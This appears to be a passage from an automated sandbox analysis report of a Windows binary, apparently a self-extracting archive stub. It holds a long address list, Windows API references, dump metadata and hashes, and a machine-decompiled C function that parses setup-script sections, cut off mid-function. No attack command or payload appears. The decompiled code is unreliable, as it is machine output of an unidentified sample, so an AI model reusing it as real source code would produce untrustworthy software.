                0x00cbc0d4
                0x00cbc0d4
                0x00cbb4e5
                0x00cbb4ed
                0x00cbb4f1
                0x00cbb4f8
                0x00cbb4ff
                0x00cbb500
                0x00cbb503
                0x00cbb50a
                0x00cbb50f
                0x00cbb516
                0x00cbb51b
                0x00cbb51d
                0x00cbb523
                0x00cbb529
                0x00cbb529
                0x00000000
                0x00cbb53e
                0x00cbb555
                0x00cbb559
                0x00000000
                0x00cbb55b
                0x00000000
                0x00cbb55b
                0x00cbb559
                0x00cbb563
                0x00000000
                0x00000000
                0x00cbb569
                0x00000000
                0x00cbb570
                0x00cbb573
                0x00000000
                0x00000000
                0x00cbb579
                0x00cbb586
                0x00cbb5ac
                0x00cbb5b7
                0x00cbb5c1
                0x00cbb5cc
                0x00cbb5d1
                0x00cbb5d9
                0x00cbb5df
                0x00cbb5e4
                0x00cbb5e6
                0x00cbb74b
                0x00cbb74b
                0x00cbb755
                0x00000000
                0x00cbb5ec
                0x00cbb5f2
                0x00cbb614
                0x00cbb623
                0x00cbb630
                0x00cbb641
                0x00cbb644
                0x00cbb647
                0x00cbb65a
                0x00cbb661
                0x00cbb666
                0x00cbb668
                0x00000000
                0x00000000
                0x00cbb66e
                0x00cbb675
                0x00cbb67a
                0x00cbb67f
                0x00cbb68b
                0x00cbb690
                0x00cbb693
                0x00cbb69a
                0x00cbb69c
                0x00cbb69d
                0x00cbb6a7
                0x00cbb6ad
                0x00cbb6ae
                0x00000000
                0x00cbb6ae
                0x00cbb650
                0x00cbb656
                0x00cbb658
                0x00000000
                0x00000000
                0x00000000
                0x00cbb6b4
                0x00cbb6bb
                0x00cbb6bd
                0x00cbb6c0
                0x00cbb730
                0x00cbb730
                0x00cbb738
                0x00cbb73e
                0x00cbb743
                0x00cbb745
                0x00cbb5f4
                0x00cbb5f9
                0x00cbb601
                0x00cbb607
                0x00cbb60e
                0x00000000
                0x00000000
                0x00000000
                0x00cbb60e
                0x00000000
                0x00cbb745
                0x00cbb6c9
                0x00cbb6cf
                0x00cbb6d1
                0x00000000
                0x00cbb6d3
                0x00cbb6d3
                0x00cbb6d5
                0x00cbb6d6
                0x00cbb6da
                0x00cbb6f2
                0x00cbb6f7
                0x00cbb701
                0x00cbb703
                0x00cbb706
                0x00cbb6d8
                0x00cbb6d8
                0x00cbb6d9
                0x00000000
                0x00cbb708
                0x00cbb716
                0x00cbb71c
                0x00cbb71e
                0x00cbb72a
                0x00cbb72a
                0x00000000
                0x00cbb71e
                0x00cbb706
                0x00cbb6d1
                0x00000000
                0x00cbb75f
                0x00cbb761
                0x00cbb7b4
                0x00cbb7b9
                0x00cbb7c2
                0x00cbb7c3
                0x00cbb7c9
                0x00cbb7ce
                0x00cbb7d1
                0x00cbb7d3
                0x00cbb7d5
                0x00cbb7da
                0x00cbb7dc
                0x00cbb7de
                0x00cbb7de
                0x00cbb7e0
                0x00cbb7e0
                0x00cbb7e5
                0x00cbb7ea
                0x00cbb7eb
                0x00cbb7eb
                0x00cbb7ec
                0x00cbb7ee
                0x00cbb7f5
                0x00cbb7fa
                0x00cbb7ee
                0x00000000
                0x00000000
                0x00cbb800
                0x00cbb802
                0x00cbb812
                0x00cbb812
                0x00000000
                0x00000000
                0x00cbb81d
                0x00cbb81f
                0x00000000
                0x00000000
                0x00cbb825
                0x00cbb82c
                0x00000000
                0x00000000
                0x00cbb832
                0x00cbb834
                0x00cbb83a
                0x00cbb83c
                0x00cbb843
                0x00cbb844
                0x00cbb84b
                0x00cbb84d
                0x00cbb84d
                0x00cbb854
                0x00cbb859
                0x00cbb85f
                0x00cbb861
                0x00000000
                0x00cbb867
                0x00cbb867
                0x00cbb86a
                0x00cbb86c
                0x00cbb86d
                0x00cbb870
                0x00cbb899
                0x00cbb899
                0x00cbb89c
                0x00cbb981
                0x00cbb98a
                0x00cbb98f
                0x00cbb98f
                0x00cbb991
                0x00cbb991
                0x00cbb993
                0x00cbb995
                0x00cbb99c
                0x00cbb9a1
                0x00cbb9a2
                0x00cbb9a3
                0x00cbb9a5
                0x00cbb9a7
                0x00cbb9ab
                0x00cbb9ad
                0x00cbb9ad
                0x00cbb9af
                0x00cbb9af
                0x00cbb9ab
                0x00cbb9b3
                0x00cbb9b9
                0x00cbb9c6
                0x00cbb9cd
                0x00cbb9dd
                0x00cbb9e7
                0x00cbb9ef
                0x00cbb9fb
                0x00cbb9fd
                0x00cbba05
                0x00cbba0a
                0x00cbba0b
                0x00cbba0c
                0x00cbba0e
                0x00cbba1b
                0x00cbba24
                0x00cbba24
                0x00000000
                0x00cbba0e
                0x00cbb8a2
                0x00cbb8a5
                0x00cbb8b2
                0x00cbb8b2
                0x00cbb8b5
                0x00cbb8b7
                0x00cbb8b8
                0x00cbb8ba
                0x00cbb8bb
                0x00cbb8c0
                0x00cbb8c5
                0x00cbb8cb
                0x00cbb8cd
                0x00cbb8cf
                0x00cbb8d2
                0x00cbb8d9
                0x00cbb8da
                0x00cbb8e0
                0x00cbb8e1
                0x00cbb8e4
                0x00cbb8e5
                0x00cbb8e6
                0x00cbb8eb
                0x00cbb8ee
                0x00cbb8f4
                0x00cbb8fd
                0x00cbb900
                0x00cbb905
                0x00cbb907
                0x00cbb909
                0x00cbb90b
                0x00cbb90b
                0x00cbb90d
                0x00cbb90d
                0x00cbb90f
                0x00cbb90f
                0x00cbb917
                0x00cbb91e
                0x00cbb920
                0x00cbb927
                0x00cbb92d
                0x00cbb92f
                0x00cbb930
                0x00cbb938
                0x00cbb947
                0x00cbb947
                0x00cbb938
                0x00cbb952
                0x00cbb954
                0x00cbb963
                0x00cbb969
                0x00cbb96f
                0x00cbb97a
                0x00cbb97a
                0x00000000
                0x00cbb96f
                0x00cbb8a7
                0x00cbb8ac
                0x00000000
                0x00000000
                0x00000000
                0x00cbb8ac
                0x00cbb872
                0x00cbb876
                0x00000000
                0x00000000
                0x00cbb878
                0x00cbb87b
                0x00cbb87d
                0x00cbb880
                0x00000000
                0x00cbb886
                0x00cbb88f
                0x00000000
                0x00cbb88f
                0x00cbb880
                0x00000000
                0x00cbba2b
                0x00cbba2c
                0x00cbba31
                0x00cbba33
                0x00cbba36
                0x00cbba36
                0x00000000
                0x00cbba6c
                0x00cbba73
                0x00cbba75
                0x00cbba75
                0x00cbba77
                0x00cbbaa6
                0x00cbbaa6
                0x00cbbaac
                0x00000000
                0x00cbbaac
                0x00cbba79
                0x00cbba79
                0x00cbba7c
                0x00cbba95
                0x00cbba9b
                0x00cbba9b
                0x00000000
                0x00cbba9b
                0x00cbba7e
                0x00cbba7e
                0x00cbba81
                0x00000000
                0x00000000
                0x00cbba83
                0x00cbba83
                0x00cbba86
                0x00000000
                0x00000000
                0x00cbba8c
                0x00000000
                0x00000000
                0x00cbbaf9
                0x00cbbafc
                0x00000000
                0x00000000
                0x00cbbafe
                0x00cbbb0a
                0x00cbbb0f
                0x00cbbb10
                0x00cbbb11
                0x00cbbb13
                0x00000000
                0x00000000
                0x00cbbb15
                0x00000000
                0x00000000
                0x00cbbb5b
                0x00cbbb5e
                0x00cbbcdf
                0x00cbbcdf
                0x00cbbce2
                0x00cbbce8
                0x00cbbcef
                0x00cbbcf1
                0x00cbbcf1
                0x00cbbcfb
                0x00cbbcfb
                0x00000000
                0x00cbbce2
                0x00cbbb64
                0x00cbbb6a
                0x00cbbb78
                0x00cbbb84
                0x00cbbb86
                0x00cbbb88
                0x00cbbb8d
                0x00cbbb8d
                0x00cbbba5
                0x00cbbbb2
                0x00cbbbb7
                0x00cbbbb9
                0x00000000
                0x00000000
                0x00cbbb8b
                0x00cbbb8b
                0x00cbbb8c
                0x00cbbb8c
                0x00cbbbc5
                0x00cbbbcb
                0x00cbbbd3
                0x00000000
                0x00000000
                0x00cbbbd9
                0x00cbbbe0
                0x00000000
                0x00000000
                0x00cbbbe6
                0x00cbbbe8
                0x00cbbbef
                0x00cbbbf5
                0x00cbbbf7
                0x00cbbbf8
                0x00cbbbfd
                0x00cbbbfe
                0x00cbbbff
                0x00cbbc01
                0x00cbbc55
                0x00cbbc55
                0x00cbbc5d
                0x00cbbc6b
                0x00cbbc7c
                0x00cbbc8a
                0x00cbbc8a
                0x00cbbc96
                0x00cbbc9b
                0x00cbbc9d
                0x00cbbcad
                0x00cbbcb7
                0x00cbbcbc
                0x00cbbcbf
                0x00000000
                0x00cbbcc5
                0x00cbbcca
                0x00cbbcca
                0x00cbbccc
                0x00cbbcd3
                0x00cbbcd9
                0x00000000
                0x00cbbcd9
                0x00cbbcbf
                0x00cbbc03
                0x00cbbc05
                0x00cbbc07
                0x00cbbc0e
                0x00000000
                0x00000000
                0x00cbbc10
                0x00cbbc12
                0x00cbbc18
                0x00cbbc18
                0x00cbbc1c
                0x00000000
                0x00000000
                0x00cbbc1e
                0x00cbbc1f
                0x00cbbc25
                0x00cbbc28
                0x00cbbc2a
                0x00cbbc2d
                0x00000000
                0x00000000
                0x00000000
                0x00cbbc2f
                0x00cbbc3c
                0x00cbbc46
                0x00cbbc4b
                0x00cbbc4b
                0x00cbbc4d
                0x00000000
                0x00000000
                0x00cbbd07
                0x00cbbd0a
                0x00cbbd0c
                0x00cbbd13
                0x00cbbd15
                0x00cbbd1b
                0x00cbbd1c
                0x00cbbd21
                0x00cbbd22
                0x00cbbd22
                0x00cbbd27
                0x00cbbd2a
                0x00cbbd30
                0x00cbbd30
                0x00cbbd35
                0x00000000
                0x00000000
                0x00cbbd41
                0x00cbbd44
                0x00cbbb25
                0x00cbbb25
                0x00000000
                0x00cbbb25
                0x00cbbd4a
                0x00cbbb16
                0x00cbbb16
                0x00cbbb1c
                0x00cbbb1d
                0x00cbbb20
                0x00000000
                0x00000000
                0x00cbbd51
                0x00cbbd54
                0x00000000
                0x00000000
                0x00cbbd5a
                0x00cbbd5c
                0x00cbbd63
                0x00cbbd6b
                0x00cbbd71
                0x00cbbd76
                0x00cbbd79
                0x00cbbdae
                0x00cbbdb3
                0x00cbbdb9
                0x00cbbdba
                0x00cbbdbf
                0x00cbbd7b
                0x00cbbd7b
                0x00cbbd7e
                0x00cbbd84
                0x00cbbd9a
                0x00cbbd9f
                0x00cbbda0
                0x00cbbda5
                0x00cbbd86
                0x00cbbd86
                0x00cbbd8b
                0x00cbbd8c
                0x00cbbd91
                0x00cbbd91
                0x00cbbd84
                0x00cbbdc6
                0x00cbbdc8
                0x00cbbdcf
                0x00cbbddd
                0x00cbbde4
                0x00cbbde9
                0x00cbbdea
                0x00cbbdeb
                0x00cbbded
                0x00cbbdee
                0x00cbbdf5
                0x00cbbe45
                0x00cbbe4a
                0x00cbbe4c
                0x00000000
                0x00000000
                0x00cbbe52
                0x00cbbe54
                0x00cbbe5a
                0x00cbbe61
                0x00000000
                0x00000000
                0x00cbbe63
                0x00cbbe65
                0x00cbbe66
                0x00cbbe66
                0x00cbbe69
                0x00cbbe6c
                0x00cbbe76
                0x00cbbe76
                0x00cbbe78
                0x00cbbe7a
                0x00cbbe84
                0x00cbbe89
                0x00cbbe8b
                0x00cbbec9
                0x00cbbecc
                0x00cbbecc
                0x00cbbece
                0x00cbbecf
                0x00cbbecf
                0x00000000
                0x00cbbecf
                0x00cbbe8d
                0x00cbbe8f
                0x00cbbe90
                0x00cbbe92
                0x00cbbe95
                0x00cbbeaa
                0x00cbbeac
                0x00cbbead
                0x00cbbead
                0x00cbbeb0
                0x00cbbeb0
                0x00cbbeb5
                0x00cbbeb6
                0x00cbbebc
                0x00cbbebc
                0x00cbbebd
                0x00cbbec2
                0x00cbbec3
                0x00cbbec4
                0x00000000
                0x00cbbec4
                0x00cbbe97
                0x00cbbe9e
                0x00cbbea1
                0x00cbbea2
                0x00000000
                0x00cbbea2
                0x00cbbe6e
                0x00cbbe70
                0x00cbbe71
                0x00cbbe74
                0x00000000
                0x00000000
                0x00000000
                0x00cbbed1
                0x00cbbed1
                0x00cbbed4
                0x00cbbed4
                0x00cbbed9
                0x00cbbedb
                0x00cbbedd
                0x00cbbedd
                0x00cbbedf
                0x00cbbedf
                0x00000000
                0x00cbbdf7
                0x00cbbdfe
                0x00cbbe0a
                0x00cbbe10
                0x00cbbe11
                0x00cbbe12
                0x00cbbe17
                0x00cbbe1a
                0x00cbbe1c
                0x00cbbe22
                0x00cbbe24
                0x00cbbe32
                0x00cbbe37
                0x00cbbe38
                0x00cbbe38
                0x00cbbee2
                0x00cbbee2
                0x00cbbeea
                0x00cbbeef
                0x00cbbef1
                0x00cbbef2
                0x00cbbef8
                0x00cbbef9
                0x00cbbeff
                0x00cbbf00
                0x00cbbf00
                0x00cbbf05
                0x00cbbf06
                0x00cbbf0c
                0x00cbbf0d
                0x00cbbf13
                0x00cbbf14
                0x00cbbf19
                0x00cbbf21
                0x00cbbf2d
                0x00cbbf2d
                0x00cbbf3a
                0x00cbbf3f
                0x00cbbf47
                0x00cbbf51
                0x00cbbf5e
                0x00cbbf65
                0x00cbbf65
                0x00cbbf71
                0x00cbbf78
                0x00cbbf7d
                0x00cbbf85
                0x00cbbf8b
                0x00cbbf8c
                0x00cbbf8d
                0x00cbbf8f
                0x00cbbf8f
                0x00cbbfa4
                0x00cbbfa9
                0x00cbbfb5
                0x00cbbfb7
                0x00cbbfc8
                0x00cbbfd5
                0x00000000
                0x00cbbfb9
                0x00cbbfc4
                0x00cbbfc6
                0x00cbbfda
                0x00cbbfda
                0x00cbbfdc
                0x00cbbfe2
                0x00cbbfe8
                0x00cbbff6
                0x00cbbffb
                0x00cbbffc
                0x00cbc004
                0x00cbc009
                0x00cbc010
                0x00cbc016
                0x00cbc018
                0x00cbc01e
                0x00cbc024
                0x00cbc026
                0x00cbc02f
                0x00cbc032
                0x00cbc034
                0x00cbc03d
                0x00cbc040
                0x00cbc046
                0x00cbc049
                0x00cbc052
                0x00cbc061
                0x00cbc066
                0x00cbc06e
                0x00cbc070
                0x00cbc071
                0x00cbc077
                0x00cbc078
                0x00cbc07a
                0x00cbc07f
                0x00cbc07f
                0x00000000
                0x00cbc06e
                0x00000000
                0x00cbbfc6
                0x00cbbfb7
                0x00000000
                0x00cbc087
                0x00cbc08a
                0x00cbc08c
                0x00cbc08c
                0x00000000
                0x00000000
                0x00cbbab8
                0x00cbbac0
                0x00cbbac6
                0x00cbbac9
                0x00cbbaed
                0x00cbbacb
                0x00cbbacb
                0x00cbbace
                0x00cbbae1
                0x00cbbad0
                0x00cbbad0
                0x00cbbad2
                0x00cbbad7
                0x00cbbad7
                0x00cbbace
                0x00000000
                0x00000000
                0x00cbbb31
                0x00cbbb32
                0x00cbbb37
                0x00cbbb37
                0x00cbbb37
                0x00cbbb3a
                0x00cbbb3f
                0x00cbbb45
                0x00cbbb45
                0x00cbbb4b
                0x00cbbb51
                0x00cbbb51
                0x00000000
                0x00000000
                0x00cbb52a
                0x00cbb52c
                0x00cbb531
                0x00cbb537
                0x00cbb53a
                0x00000000
                0x00cbb53c
                0x00cbb53c
                0x00000000
                0x00cbb53c
                0x00cbc093
                0x00cbc093
                0x00cbc098
                0x00cbc09c
                0x00cbc0a0
                0x00cbc0a7
                0x00cbc0ae
                0x00cbc0b1
                0x00cbc0b6
                0x00cbc0b9
                0x00cbc0bc
                0x00cbc0c6

                APIs
                • __EH_prolog.LIBCMT ref: 00CBB4CC
                  • Part of subcall function 00CBA156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CBA21E
                • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,00CBADDF,?,00000000), ref: 00CBB601
                • GetFileAttributesW.KERNEL32(?), ref: 00CBB6BB
                • DeleteFileW.KERNEL32(?), ref: 00CBB6C9
                • SetWindowTextW.USER32(?,?), ref: 00CBB812
                • _wcsrchr.LIBVCRUNTIME ref: 00CBB99C
                • GetDlgItem.USER32(?,00000066), ref: 00CBB9D7
                • SetWindowTextW.USER32(00000000,?), ref: 00CBB9E7
                • SendMessageW.USER32(00000000,00000143,00000000,00CE9602), ref: 00CBB9FB
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CBBA24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                • API String ID: 3676479488-312220925
                • Opcode ID: 1834df9cab704b003eab3c10a62b468459cfa29036208e9377663a19245a0123
                • Instruction ID: 500cb27566139d66037d21f9f703e696d779a29e2893dbca0b0e180202d1e8fa
                • Opcode Fuzzy Hash: 1834df9cab704b003eab3c10a62b468459cfa29036208e9377663a19245a0123
                • Instruction Fuzzy Hash: 3FE14072D00219AAEF24EBA4DD85EEE737CAF45350F0041A6F559E7041EFB09F849BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CACFD0, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 557COMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00CACFD0(signed int __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t196;
				void* _t197;
				WCHAR* _t198;
				void* _t203;
				signed int _t212;
				signed int _t215;
				signed int _t218;
				signed int _t228;
				void* _t229;
				void* _t232;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t244;
				signed int _t248;
				signed int _t262;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t272;
				signed int _t273;
				void* _t274;
				signed int _t279;
				char* _t280;
				signed int _t284;
				short _t287;
				void* _t288;
				signed int _t294;
				signed int _t299;
				void* _t302;
				void* _t304;
				void* _t307;
				signed int _t316;
				signed int _t318;
				unsigned int _t328;
				signed int _t330;
				unsigned int _t333;
				signed int _t336;
				void* _t343;
				signed int _t348;
				signed int _t351;
				signed int _t352;
				signed int _t357;
				signed int _t361;
				void* _t370;
				signed int _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t387;
				signed int _t389;
				signed int* _t390;
				void* _t391;
				void* _t392;
				void* _t394;
				void* _t398;
				void* _t399;

				_t370 = __edx;
				_t318 = __ecx;
				_t392 = _t391 - 0x6c;
				E00CBD870(E00CD13DF, _t390);
				E00CBD940();
				_t196 = 0x5c;
				_push(0x427c);
				_push(_t390[0x1e]);
				_t387 = _t318;
				_t390[0x11] = _t196;
				_t390[0x12] = _t387;
				_t197 = E00CC0BB8(_t318);
				_t316 = 0;
				_t396 = _t197;
				_t198 = _t390 - 0x1264;
				if(_t197 != 0) {
					E00CAFAB1(_t198, _t390[0x1e], 0x800);
				} else {
					GetModuleFileNameW(0, _t198, 0x800);
					 *((short*)(E00CAB943(_t396, _t390 - 0x1264))) = 0;
					E00CAFA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
				}
				E00CA943C(_t390 - 0x2288);
				_push(4);
				 *(_t390 - 4) = _t316;
				_push(_t390 - 0x1264);
				if(E00CA9768(_t390 - 0x2288, _t387) == 0) {
					L57:
					_t203 = E00CA946E(_t390 - 0x2288); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
					return _t203;
				} else {
					_t380 = _t316;
					_t398 =  *0xcdd5f4 - _t380; // 0x63
					if(_t398 <= 0) {
						L7:
						E00CC5030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E00CACC62);
						E00CC5030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E00CACBC7);
						_t394 = _t392 + 0x20;
						_t390[0x1e] = _t316;
						_t381 = _t380 | 0xffffffff;
						_t390[0x16] = _t316;
						_t390[0x19] = _t381;
						while(_t381 == 0xffffffff) {
							_t390[0x1b] = E00CA9B57();
							_t294 = E00CA9979(_t370, _t390 - 0x4288, 0x2000);
							_t390[0x17] = _t294;
							_t384 = _t316;
							_t25 = _t294 - 0x10; // -16
							_t361 = _t25;
							_t390[0x15] = _t361;
							if(_t361 < 0) {
								L25:
								_t295 = _t390[0x1b];
								_t381 = _t390[0x19];
								L26:
								E00CA9A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
								_t299 = _t390[0x16] + 1;
								_t390[0x16] = _t299;
								__eflags = _t299 - 0x100;
								if(_t299 < 0x100) {
									continue;
								}
								__eflags = _t381 - 0xffffffff;
								if(_t381 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
									L14:
									_t370 = 0x2a;
									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
										L18:
										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
											L21:
											_t384 = _t384 + 1;
											if(_t384 > _t390[0x15]) {
												goto L25;
											}
											_t294 = _t390[0x17];
											continue;
										} else {
											_t302 = E00CC5460(_t390 - 0x4286 + _t384, 0xcd261c, 4);
											_t394 = _t394 + 0xc;
											if(_t302 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t366 = _t390 - 0x4284 + _t384;
									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
										_t304 = E00CC4DA0(_t366, L"*messages***", 0xb);
										_t394 = _t394 + 0xc;
										if(_t304 == 0) {
											_t390[0x1e] = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t307 = E00CC5460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
									_t394 = _t394 + 0xc;
									if(_t307 == 0) {
										L24:
										_t295 = _t390[0x1b];
										_t381 = _t384 + _t390[0x1b];
										_t390[0x19] = _t381;
										goto L26;
									}
									_t294 = _t390[0x17];
									goto L14;
								}
							}
						}
						asm("cdq");
						E00CA9A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
						_push(0x200002);
						_t382 = E00CC2B53(_t390 - 0x2288);
						_t390[0x1a] = _t382;
						__eflags = _t382;
						if(_t382 == 0) {
							goto L57;
						}
						_t328 = E00CA9979(_t370, _t382, 0x200000);
						_t390[0x19] = _t328;
						__eflags = _t390[0x1e];
						if(_t390[0x1e] == 0) {
							_push(2 + _t328 * 2);
							_t212 = E00CC2B53(_t328);
							_t390[0x1e] = _t212;
							__eflags = _t212;
							if(_t212 == 0) {
								goto L57;
							}
							_t330 = _t390[0x19];
							 *(_t330 + _t382) = _t316;
							__eflags = _t330 + 1;
							E00CB0FDE(_t382, _t212, _t330 + 1);
							L00CC2B4E(_t382);
							_t382 = _t390[0x1e];
							_t333 = _t390[0x19];
							_t390[0x1a] = _t382;
							L33:
							_t215 = 0x100000;
							__eflags = _t333 - 0x100000;
							if(_t333 <= 0x100000) {
								_t215 = _t333;
							}
							 *((short*)(_t382 + _t215 * 2)) = 0;
							E00CAFA56(_t390 - 0xd4, 0xcd2624, 0x64);
							_push(0x20002);
							_t218 = E00CC2B53(0);
							_t390[0x1b] = _t218;
							__eflags = _t218;
							if(_t218 != 0) {
								__eflags = _t390[0x19];
								_t336 = _t316;
								_t371 = _t316;
								_t390[0x1e] = _t336;
								 *_t390 = _t316;
								_t383 = _t316;
								_t390[0x17] = _t316;
								if(_t390[0x19] <= 0) {
									L54:
									E00CACB33(_t387, _t371, _t390, _t218, _t336);
									L00CC2B4E(_t390[0x1a]);
									L00CC2B4E(_t390[0x1b]);
									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
										L56:
										 *0xce0124 =  *((intOrPtr*)(_t387 + 0x28));
										E00CC5030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E00CACD08);
										E00CC5030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E00CACD37);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00CB3393(_t387 + 0x3c, _t371, _t316);
										E00CB3393(_t387 + 0x50, _t371, _t316);
										_t316 = _t316 + 1;
										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
									goto L56;
								}
								_t390[0x14] = 0xd;
								_t390[0x13] = 0xa;
								_t390[0x15] = 9;
								do {
									_t228 = _t390[0x1a];
									__eflags = _t383;
									if(_t383 == 0) {
										L80:
										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
										_t383 = _t383 + 1;
										__eflags = _t372;
										if(_t372 == 0) {
											break;
										}
										__eflags = _t372 - _t390[0x11];
										if(_t372 != _t390[0x11]) {
											_t229 = 0xd;
											__eflags = _t372 - _t229;
											if(_t372 == _t229) {
												L99:
												E00CACB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
												 *_t390 = _t316;
												_t336 = _t316;
												_t390[0x17] = _t316;
												L98:
												_t390[0x1e] = _t336;
												goto L52;
											}
											_t232 = 0xa;
											__eflags = _t372 - _t232;
											if(_t372 == _t232) {
												goto L99;
											}
											L96:
											__eflags = _t336 - 0x10000;
											if(_t336 >= 0x10000) {
												goto L52;
											}
											 *(_t390[0x1b] + _t336 * 2) = _t372;
											_t336 = _t336 + 1;
											__eflags = _t336;
											goto L98;
										}
										__eflags = _t336 - 0x10000;
										if(_t336 >= 0x10000) {
											goto L52;
										}
										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t235;
										if(_t235 == 0) {
											_push(0x22);
											L93:
											_pop(_t377);
											 *(_t390[0x1b] + _t336 * 2) = _t377;
											_t336 = _t336 + 1;
											_t390[0x1e] = _t336;
											_t383 = _t383 + 1;
											goto L52;
										}
										_t237 = _t235 - 0x3a;
										__eflags = _t237;
										if(_t237 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t238 = _t237 - 0x12;
										__eflags = _t238;
										if(_t238 == 0) {
											_push(0xa);
											goto L93;
										}
										_t239 = _t238 - 4;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t239 != 0;
										if(_t239 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
									__eflags = _t373 - _t390[0x14];
									if(_t373 == _t390[0x14]) {
										L42:
										_t343 = 0x3a;
										__eflags =  *(_t228 + _t383 * 2) - _t343;
										if( *(_t228 + _t383 * 2) != _t343) {
											L71:
											_t390[0x18] = _t228 + _t383 * 2;
											_t244 = E00CAF91A( *(_t228 + _t383 * 2) & 0x0000ffff);
											__eflags = _t244;
											if(_t244 == 0) {
												L79:
												_t336 = _t390[0x1e];
												_t228 = _t390[0x1a];
												goto L80;
											}
											E00CAFAB1(_t390 - 0x264, _t390[0x18], 0x64);
											_t248 = E00CC4E1D(_t390 - 0x264, L" \t,");
											_t390[0x18] = _t248;
											__eflags = _t248;
											if(_t248 == 0) {
												goto L79;
											}
											 *_t248 = 0;
											E00CB11FA(_t390 - 0x264, _t390 - 0x138, 0x64);
											E00CAFA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
											E00CAFA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
											E00CAFA56(_t390, _t390 - 0x70, 0x32);
											_t262 = E00CC4E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E00CACCED);
											_t394 = _t394 + 0x14;
											__eflags = _t262;
											if(_t262 != 0) {
												_t268 =  *_t262 * 0xc;
												__eflags = _t268;
												_t167 = _t268 + 0xcdd150; // 0x28b64ee0
												_t390[0x17] =  *_t167;
											}
											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
											__eflags = _t383;
											_t267 = _t390[0x1a];
											_t374 = 0x20;
											while(1) {
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												L77:
												_t174 =  &(_t390[0x15]); // 0x9
												__eflags = _t348 -  *_t174;
												if(_t348 !=  *_t174) {
													L51:
													_t336 = _t390[0x1e];
													goto L52;
												}
												L78:
												_t383 = _t383 + 1;
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												goto L77;
											}
										}
										_t389 = _t390[0x1a];
										_t270 = _t228 | 0xffffffff;
										__eflags = _t270;
										_t390[0x16] = _t270;
										_t390[0xd] = L"STRINGS";
										_t390[0xe] = L"DIALOG";
										_t390[0xf] = L"MENU";
										_t390[0x10] = L"DIRECTION";
										_t390[0x18] = _t316;
										do {
											_t390[0x18] = E00CC2B33( *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)));
